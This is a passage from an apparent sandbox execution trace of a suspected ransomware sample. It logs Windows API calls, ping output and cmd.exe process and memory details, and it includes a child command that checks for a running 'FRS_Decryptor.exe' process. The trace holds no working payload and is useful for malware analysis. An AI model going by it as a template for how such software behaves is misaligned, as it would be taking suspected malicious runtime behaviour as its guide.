CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 93 [0106.634] LocalAlloc (uFlags=0x40, uBytes=0x5d) returned 0xb48068 [0106.634] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0xb48068, cbMultiByte=93, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", lpUsedDefaultChar=0x0) returned 93 [0106.634] _fileno (_File=0x76ea4c28) returned 1 [0106.634] _write (in: _FileHandle=1, _Buf=0xb48068*, _MaxCharCount=0x5c | out: _Buf=0xb48068*) returned 92 [0106.634] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0106.634] _fileno (_File=0x76ea4c28) returned 1 [0106.634] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0106.634] LocalFree (hMem=0xb48068) returned 0x0 [0106.634] LocalFree (hMem=0xb47fa0) returned 0x0 [0106.634] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2753, dwLanguageId=0x0, lpBuffer=0x5aef98, nSize=0x0, Arguments=0x5aef94 | out: lpBuffer="羠´Zᨧ\x94䰨盪❓") returned 0x61 [0106.634] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0106.634] _fileno (_File=0x76ea4c28) returned 1 [0106.634] _get_osfhandle (_FileHandle=1) returned 0x28 [0106.634] GetFileType (hFile=0x28) returned 0x2 [0106.634] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x5aef5c | out: lpMode=0x5aef5c) returned 0 [0106.634] GetLastError () returned 0x6 [0106.634] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x5aeec0, nSize=0x50 | out: lpBuffer="Z❓") returned 0x0 [0106.634] _fileno (_File=0x76ea4c28) returned 1 [0106.634] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0106.634] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 98 [0106.634] LocalAlloc (uFlags=0x40, uBytes=0x62) returned 0xb48070 [0106.634] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", cchWideChar=-1, lpMultiByteStr=0xb48070, cbMultiByte=98, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", lpUsedDefaultChar=0x0) returned 98 [0106.634] _fileno (_File=0x76ea4c28) returned 1 [0106.634] _write (in: _FileHandle=1, _Buf=0xb48070*, _MaxCharCount=0x61 | out: _Buf=0xb48070*) returned 97 [0106.634] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0106.634] _fileno (_File=0x76ea4c28) returned 1 [0106.634] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0106.634] LocalFree (hMem=0xb48070) returned 0x0 [0106.634] LocalFree (hMem=0xb47fa0) returned 0x0 [0106.634] IcmpCloseHandle (IcmpHandle=0xb369c0) returned 1 [0106.635] LocalFree (hMem=0xb3c200) returned 0x0 [0106.635] LocalFree (hMem=0xb45270) returned 0x0 [0106.635] WSACleanup () returned 0 [0106.635] exit (_Code=0) Thread: id = 287 os_tid = 0x63c Thread: id = 288 os_tid = 0x2a0 Process: id = "102" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x5d509000" os_pid = "0x80c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5275 start_va = 0x9f0000 end_va = 0xa0ffff entry_point = 0x0 region_type = private name = "private_0x00000000009f0000" filename = "" Region: id = 5276 start_va = 0xa10000 end_va = 0xa11fff entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" Region: id = 5277 start_va = 0xa20000 end_va = 0xa2efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a20000" filename = "" Region: id = 5278 start_va = 0xa30000 end_va = 0xa6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a30000" filename = "" Region: id = 5279 start_va = 0xa70000 end_va = 0xb6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a70000" filename = "" Region: id = 5280 start_va = 0xb70000 end_va = 0xb73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b70000" filename = "" Region: id = 5281 start_va = 0xb80000 end_va = 0xb80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b80000" filename = "" Region: id = 5282 start_va = 0xb90000 end_va = 0xb91fff entry_point = 0x0 region_type = private name = "private_0x0000000000b90000" filename = "" Region: id = 5283 start_va = 0x1290000 end_va = 0x12defff entry_point = 0x1290000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 5284 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5285 start_va = 0x7e240000 end_va = 0x7e262fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e240000" filename = "" Region: id = 5286 start_va = 0x7e265000 end_va = 0x7e265fff entry_point = 0x0 region_type = private name = "private_0x000000007e265000" filename = "" Region: id = 5287 start_va = 0x7e267000 end_va = 0x7e267fff entry_point = 0x0 region_type = private name = "private_0x000000007e267000" filename = "" Region: id = 5288 start_va = 0x7e26d000 end_va = 0x7e26ffff entry_point = 0x0 region_type = private name = "private_0x000000007e26d000" filename = "" Region: id = 5289 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5290 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5291 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5292 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 5293 start_va = 0xd20000 end_va = 0xd2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d20000" filename = "" Region: id = 5294 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5295 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5296 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5297 start_va = 0x9f0000 end_va = 0x9fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009f0000" filename = "" Region: id = 5298 start_va = 0xba0000 end_va = 0xc1dfff entry_point = 0xba0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5299 start_va = 0xc50000 end_va = 0xc5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c50000" filename = "" Region: id = 5300 start_va = 0xea0000 end_va = 0xf9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ea0000" filename = "" Region: id = 5301 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5302 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5303 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5304 start_va = 0x7e140000 end_va = 0x7e23ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e140000" filename = "" Region: id = 5305 start_va = 0xa00000 end_va = 0xa03fff entry_point = 0x0 region_type = private name = "private_0x0000000000a00000" filename = "" Region: id = 5306 start_va = 0xfa0000 end_va = 0x1274fff entry_point = 0xfa0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 5325 start_va = 0xa10000 end_va = 0xa13fff entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" Thread: id = 289 os_tid = 0x858 [0106.667] GetModuleHandleA (lpModuleName=0x0) returned 0x1290000 [0106.667] __set_app_type (_Type=0x1) [0106.668] __p__fmode () returned 0x76ea1768 [0106.668] __p__commode () returned 0x76ea176c [0106.668] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x12a89b1) returned 0x0 [0106.668] __getmainargs (in: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0, _DoWildCard=0, _StartInfo=0x12b507c | out: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0) returned 0 [0106.668] GetCurrentThreadId () returned 0x858 [0106.668] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x858) returned 0x34 [0106.668] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0106.668] GetProcAddress (hModule=0x74f70000, lpProcName="SetThreadUILanguage") returned 0x74fb3daf [0106.668] SetThreadUILanguage (LangId=0x0) returned 0x409 [0106.670] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0106.670] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0xb6f868 | out: phkResult=0xb6f868*=0x0) returned 0x2 [0106.670] VirtualQuery (in: lpAddress=0xb6f877, lpBuffer=0xb6f810, dwLength=0x1c | out: lpBuffer=0xb6f810*(BaseAddress=0xb6f000, AllocationBase=0xa70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0106.670] VirtualQuery (in: lpAddress=0xa70000, lpBuffer=0xb6f810, dwLength=0x1c | out: lpBuffer=0xb6f810*(BaseAddress=0xa70000, AllocationBase=0xa70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0106.670] VirtualQuery (in: lpAddress=0xa71000, lpBuffer=0xb6f810, dwLength=0x1c | out: lpBuffer=0xb6f810*(BaseAddress=0xa71000, AllocationBase=0xa70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0106.670] VirtualQuery (in: lpAddress=0xa73000, lpBuffer=0xb6f810, dwLength=0x1c | out: lpBuffer=0xb6f810*(BaseAddress=0xa73000, AllocationBase=0xa70000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0106.670] VirtualQuery (in: lpAddress=0xb70000, lpBuffer=0xb6f810, dwLength=0x1c | out: lpBuffer=0xb6f810*(BaseAddress=0xb70000, AllocationBase=0xb70000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0106.670] GetConsoleOutputCP () returned 0x1b5 [0106.670] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0106.671] SetConsoleCtrlHandler (HandlerRoutine=0x12b1877, Add=1) returned 1 [0106.671] _get_osfhandle (_FileHandle=1) returned 0x158 [0106.671] SetConsoleMode (hConsoleHandle=0x158, dwMode=0x0) returned 0 [0106.671] _get_osfhandle (_FileHandle=1) returned 0x158 [0106.671] GetConsoleMode (in: hConsoleHandle=0x158, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0106.671] _get_osfhandle (_FileHandle=0) returned 0x24 [0106.671] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0106.671] GetEnvironmentStringsW () returned 0xea40c0* [0106.671] FreeEnvironmentStringsA (penv="=") returned 1 [0106.671] GetEnvironmentStringsW () returned 0xea40c0* [0106.671] FreeEnvironmentStringsA (penv="=") returned 1 [0106.671] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xb6e7b8 | out: phkResult=0xb6e7b8*=0x44) returned 0x0 [0106.671] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xb6e7c0, lpData=0xb6e7c4, lpcbData=0xb6e7bc*=0x1000 | out: lpType=0xb6e7c0*=0x0, lpData=0xb6e7c4*=0x1c, lpcbData=0xb6e7bc*=0x1000) returned 0x2 [0106.671] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xb6e7c0, lpData=0xb6e7c4, lpcbData=0xb6e7bc*=0x1000 | out: lpType=0xb6e7c0*=0x4, lpData=0xb6e7c4*=0x1, lpcbData=0xb6e7bc*=0x4) returned 0x0 [0106.671] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xb6e7c0, lpData=0xb6e7c4, lpcbData=0xb6e7bc*=0x1000 | out: lpType=0xb6e7c0*=0x0, lpData=0xb6e7c4*=0x1, lpcbData=0xb6e7bc*=0x1000) returned 0x2 [0106.671] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xb6e7c0, lpData=0xb6e7c4, lpcbData=0xb6e7bc*=0x1000 | out: lpType=0xb6e7c0*=0x4, lpData=0xb6e7c4*=0x0, lpcbData=0xb6e7bc*=0x4) returned 0x0 [0106.671] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xb6e7c0, lpData=0xb6e7c4, lpcbData=0xb6e7bc*=0x1000 | out: lpType=0xb6e7c0*=0x4, lpData=0xb6e7c4*=0x40, lpcbData=0xb6e7bc*=0x4) returned 0x0 [0106.671] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xb6e7c0, lpData=0xb6e7c4, lpcbData=0xb6e7bc*=0x1000 | out: lpType=0xb6e7c0*=0x4, lpData=0xb6e7c4*=0x40, lpcbData=0xb6e7bc*=0x4) returned 0x0 [0106.671] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0xb6e7c0, lpData=0xb6e7c4, lpcbData=0xb6e7bc*=0x1000 | out: lpType=0xb6e7c0*=0x0, lpData=0xb6e7c4*=0x40, lpcbData=0xb6e7bc*=0x1000) returned 0x2 [0106.671] RegCloseKey (hKey=0x44) returned 0x0 [0106.671] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xb6e7b8 | out: phkResult=0xb6e7b8*=0x44) returned 0x0 [0106.672] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xb6e7c0, lpData=0xb6e7c4, lpcbData=0xb6e7bc*=0x1000 | out: lpType=0xb6e7c0*=0x0, lpData=0xb6e7c4*=0x40, lpcbData=0xb6e7bc*=0x1000) returned 0x2 [0106.672] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xb6e7c0, lpData=0xb6e7c4, lpcbData=0xb6e7bc*=0x1000 | out: lpType=0xb6e7c0*=0x4, lpData=0xb6e7c4*=0x1, lpcbData=0xb6e7bc*=0x4) returned 0x0 [0106.672] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xb6e7c0, lpData=0xb6e7c4, lpcbData=0xb6e7bc*=0x1000 | out: lpType=0xb6e7c0*=0x0, lpData=0xb6e7c4*=0x1, lpcbData=0xb6e7bc*=0x1000) returned 0x2 [0106.672] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xb6e7c0, lpData=0xb6e7c4, lpcbData=0xb6e7bc*=0x1000 | out: lpType=0xb6e7c0*=0x4, lpData=0xb6e7c4*=0x0, lpcbData=0xb6e7bc*=0x4) returned 0x0 [0106.672] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xb6e7c0, lpData=0xb6e7c4, lpcbData=0xb6e7bc*=0x1000 | out: lpType=0xb6e7c0*=0x4, lpData=0xb6e7c4*=0x9, lpcbData=0xb6e7bc*=0x4) returned 0x0 [0106.672] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xb6e7c0, lpData=0xb6e7c4, lpcbData=0xb6e7bc*=0x1000 | out: lpType=0xb6e7c0*=0x4, lpData=0xb6e7c4*=0x9, lpcbData=0xb6e7bc*=0x4) returned 0x0 [0106.672] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0xb6e7c0, lpData=0xb6e7c4, lpcbData=0xb6e7bc*=0x1000 | out: lpType=0xb6e7c0*=0x0, lpData=0xb6e7c4*=0x9, lpcbData=0xb6e7bc*=0x1000) returned 0x2 [0106.672] RegCloseKey (hKey=0x44) returned 0x0 [0106.672] time (in: timer=0x0 | out: timer=0x0) returned 0x5aa50095 [0106.672] srand (_Seed=0x5aa50095) [0106.672] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" [0106.672] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" [0106.672] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0106.672] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xea40c8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0106.672] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0106.672] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0106.672] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0106.672] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0106.672] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0106.672] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0106.672] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0106.672] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0106.672] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0106.672] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0106.672] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0106.672] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0106.672] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0106.672] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xb6f598 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0106.672] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", nBufferLength=0x104, lpBuffer=0xb6f598, lpFilePart=0xb6f594 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xb6f594*="Desktop") returned 0x1c [0106.673] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0106.673] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xb6f310 | out: lpFindFileData=0xb6f310) returned 0xea42d8 [0106.673] FindClose (in: hFindFile=0xea42d8 | out: hFindFile=0xea42d8) returned 1 [0106.673] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp", lpFindFileData=0xb6f310 | out: lpFindFileData=0xb6f310) returned 0xea42d8 [0106.673] FindClose (in: hFindFile=0xea42d8 | out: hFindFile=0xea42d8) returned 1 [0106.673] _wcsnicmp (_String1="5JGHKO~1", _String2="5JgHKoaOfdp", _MaxCount=0xb) returned 29 [0106.673] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFindFileData=0xb6f310 | out: lpFindFileData=0xb6f310) returned 0xea42d8 [0106.673] FindClose (in: hFindFile=0xea42d8 | out: hFindFile=0xea42d8) returned 1 [0106.673] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0106.673] SetCurrentDirectoryW (lpPathName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 1 [0106.673] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 1 [0106.673] GetEnvironmentStringsW () returned 0xea6190* [0106.673] FreeEnvironmentStringsA (penv="=") returned 1 [0106.673] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0106.674] GetConsoleOutputCP () returned 0x1b5 [0106.674] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0106.674] GetUserDefaultLCID () returned 0x409 [0106.674] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12b5560, cchData=8 | out: lpLCData=":") returned 2 [0106.674] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0xb6f6c4, cchData=128 | out: lpLCData="0") returned 2 [0106.674] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0xb6f6c4, cchData=128 | out: lpLCData="0") returned 2 [0106.674] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0xb6f6c4, cchData=128 | out: lpLCData="1") returned 2 [0106.674] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12b5570, cchData=8 | out: lpLCData="/") returned 2 [0106.674] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12b5660, cchData=32 | out: lpLCData="Mon") returned 4 [0106.674] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12b56a0, cchData=32 | out: lpLCData="Tue") returned 4 [0106.674] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12b56e0, cchData=32 | out: lpLCData="Wed") returned 4 [0106.674] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12b5720, cchData=32 | out: lpLCData="Thu") returned 4 [0106.674] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12b5760, cchData=32 | out: lpLCData="Fri") returned 4 [0106.674] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12b57a0, cchData=32 | out: lpLCData="Sat") returned 4 [0106.674] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12b57e0, cchData=32 | out: lpLCData="Sun") returned 4 [0106.674] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12b5580, cchData=8 | out: lpLCData=".") returned 2 [0106.674] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12b5590, cchData=8 | out: lpLCData=",") returned 2 [0106.675] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0106.675] GetConsoleTitleW (in: lpConsoleTitle=0xea4e28, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0106.675] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0106.676] GetProcAddress (hModule=0x74f70000, lpProcName="CopyFileExW") returned 0x74f95d45 [0106.676] GetProcAddress (hModule=0x74f70000, lpProcName="IsDebuggerPresent") returned 0x74f8d16f [0106.676] GetProcAddress (hModule=0x74f70000, lpProcName="SetConsoleInputExeNameW") returned 0x759cdda0 [0106.676] _wcsicmp (_String1="tasklist", _String2=")") returned 75 [0106.676] _wcsicmp (_String1="FOR", _String2="tasklist") returned -14 [0106.676] _wcsicmp (_String1="FOR/?", _String2="tasklist") returned -14 [0106.676] _wcsicmp (_String1="IF", _String2="tasklist") returned -11 [0106.676] _wcsicmp (_String1="IF/?", _String2="tasklist") returned -11 [0106.676] _wcsicmp (_String1="REM", _String2="tasklist") returned -2 [0106.676] _wcsicmp (_String1="REM/?", _String2="tasklist") returned -2 [0106.677] _wcsicmp (_String1="FOR", _String2="find") returned 6 [0106.677] _wcsicmp (_String1="FOR/?", _String2="find") returned 6 [0106.677] _wcsicmp (_String1="IF", _String2="find") returned 3 [0106.677] _wcsicmp (_String1="IF/?", _String2="find") returned 3 [0106.677] _wcsicmp (_String1="REM", _String2="find") returned 12 [0106.677] _wcsicmp (_String1="REM/?", _String2="find") returned 12 [0106.678] _pipe (in: _PtHandles=0xea51f0, _PipeSize=0x0, _TextMode=32768 | out: _PtHandles=0xea51f0) returned 0 [0106.678] _dup (_FileHandle=1) returned 5 [0106.678] _dup2 (_FileHandleSrc=4, _FileHandleDst=1) returned 0 [0106.678] _close (_FileHandle=4) returned 0 [0106.678] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0106.678] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0106.678] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0106.678] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0106.678] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0106.678] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0106.678] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0106.678] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0106.678] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0106.678] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0106.678] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0106.679] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0106.679] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0106.679] _wcsicmp 